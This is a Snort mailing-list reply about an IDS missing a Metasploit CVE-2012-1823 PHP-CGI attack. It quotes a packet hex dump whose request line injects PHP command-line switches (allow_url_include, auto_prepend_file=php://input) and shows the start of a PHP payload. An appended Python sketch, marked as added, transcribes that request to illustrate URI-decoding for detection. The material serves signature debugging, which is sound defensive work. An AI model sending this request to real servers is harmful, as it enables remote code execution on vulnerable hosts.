Snort mailing list archives
Re: Metasploit - CVE-2012-1823 - Snort Sleeping
From: "lists () packetmail net" <lists () packetmail net>
Date: Fri, 26 Apr 2013 16:01:07 -0500
On 04/26/2013 03:56 PM, MA Bel wrote:
Got a pcap?
Again, need to see your Snort.conf; what's $HOME_NET, what's $EXTERNAL_NET,
what's http_inspect and stream5 look like?
18:26:21.787981 IP 192.168.238.111.51274 > 192.168.238.222.80: Flags [P.], seq
1:2039, ack 1, win 913, options [nop,nop,TS val 8260740 ecr 1348643], length 2038
0x0000: 4500 082a 7310 4000 4006 611e c0a8 ee6f E..*s.@.@.a....o
0x0010: c0a8 eede c84a 0050 be52 7f8b dc23 2563 .....J.P.R...#%c
0x0020: 8018 0391 66bc 0000 0101 080a 007e 0c84 ....f........~..
0x0030: 0014 9423 504f 5354 202f 3f2d 2d64 6566 ...#POST./?--def
0x0040: 696e 652b 616c 6c6f 775f 7572 6c5f 696e ine+allow_url_in
0x0050: 636c 7564 6525 3364 7452 5565 2b2d 2d64 clude%3dtRUe+--d
0x0060: 6566 696e 652b 7361 6665 5f6d 6f64 6525 efine+safe_mode%
0x0070: 3364 4f66 662b 2d25 3634 2b73 7568 6f73 3dOff+-%64+suhos
0x0080: 696e 2e73 696d 756c 6174 696f 6e25 3364 in.simulation%3d
0x0090: 4f4e 2b2d 2536 342b 6469 7361 626c 655f ON+-%64+disable_
0x00a0: 6675 6e63 7469 6f6e 7325 3364 2532 3225 functions%3d%22%
0x00b0: 3232 2b2d 2536 342b 6f70 656e 5f62 6173 22+-%64+open_bas
0x00c0: 6564 6972 2533 646e 6f6e 652b 2d25 3634 edir%3dnone+-%64
0x00d0: 2b61 7574 6f5f 7072 6570 656e 645f 6669 +auto_prepend_fi
0x00e0: 6c65 2533 6470 6870 3a2f 2f69 6e70 7574 le%3dphp://input
0x00f0: 2b2d 2d6e 6f2d 7068 702d 696e 692b 2b20 +--no-php-ini++.
0x0100: 4854 5450 2f31 2e31 0d0a 486f 7374 3a20 HTTP/1.1..Host:.
0x0110: 3139 322e 3136 382e 3233 382e 3232 320d 192.168.238.222.
0x0120: 0a55 7365 722d 4167 656e 743a 204d 6f7a .User-Agent:.Moz
0x0130: 696c 6c61 2f34 2e30 2028 636f 6d70 6174 illa/4.0.(compat
0x0140: 6962 6c65 3b20 4d53 4945 2036 2e30 3b20 ible;.MSIE.6.0;.
0x0150: 5769 6e64 6f77 7320 4e54 2035 2e31 290d Windows.NT.5.1).
0x0160: 0a43 6f6e 7465 6e74 2d54 7970 653a 2061 .Content-Type:.a
0x0170: 7070 6c69 6361 7469 6f6e 2f78 2d77 7777 pplication/x-www
0x0180: 2d66 6f72 6d2d 7572 6c65 6e63 6f64 6564 -form-urlencoded
0x0190: 0d0a 436f 6e74 656e 742d 4c65 6e67 7468 ..Content-Length
0x01a0: 3a20 3136 3634 0d0a 0d0a 3c3f 7068 7020 :.1664....<?php.
0x01b0: 0909 0940 7365 745f 7469 6d65 5f6c 696d ...@set_time_lim
0x01c0: 6974 2830 293b 2040 6967 6e6f 7265 5f75 it(0);.@ignore_u
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org
Please visit http://blog.snort.org for the latest news about Snort!
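Added example (not part of the original message, and not Snort's own code): a short Python sketch of why URI normalisation matters for the request in the dump above. The request line is transcribed from the dump's ASCII column; the two contrast requests, the naive raw signature and all function names are constructed for illustration, and cgi_args is a simplified model of the CGI command-line rule, not php-cgi's actual parser.

```python
import re
from urllib.parse import unquote

# Request line transcribed from the ASCII column of the dump above.
DUMP_REQUEST = (
    "POST /?--define+allow_url_include%3dtRUe+--define+safe_mode%3dOff"
    "+-%64+suhosin.simulation%3dON+-%64+disable_functions%3d%22%22"
    "+-%64+open_basedir%3dnone+-%64+auto_prepend_file%3dphp://input"
    "+--no-php-ini++ HTTP/1.1"
)
# Constructed request lines for contrast (not from the thread).
BENIGN = "GET /index.php?page=2&sort=-date HTTP/1.1"
LITERAL = "GET /index.php?-d+allow_url_include%3dOn HTTP/1.1"

# Hypothetical naive signature: a literal "-d" switch in the raw, undecoded URI.
RAW_SIG = re.compile(r"[?+]-d\+")
# A decoded argument that looks like a short or long command-line switch.
SWITCH = re.compile(r"^-{1,2}[A-Za-z]")


def cgi_args(request_line):
    """Simplified model of the CGI command-line rule: a query string with no
    unencoded '=' is split on '+' and each word is percent-decoded."""
    parts = request_line.split(" ")
    if len(parts) < 2 or "?" not in parts[1]:
        return []
    query = parts[1].split("?", 1)[1]
    if "=" in query:  # unencoded '=' means ordinary form data, not argv
        return []
    return [unquote(word) for word in query.split("+") if word]


def injected_switches(request_line):
    """Switches visible only after decoding, e.g. '-%64' becomes '-d'."""
    return [arg for arg in cgi_args(request_line) if SWITCH.match(arg)]


def raw_match(request_line):
    """True if the naive raw-URI signature fires."""
    return bool(RAW_SIG.search(request_line))


if __name__ == "__main__":
    for line in (DUMP_REQUEST, BENIGN, LITERAL):
        print(raw_match(line), injected_switches(line), line[:40])
```

The raw signature fires only on the constructed literal "-d" request; the dump's request is flagged only once each word has been percent-decoded.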
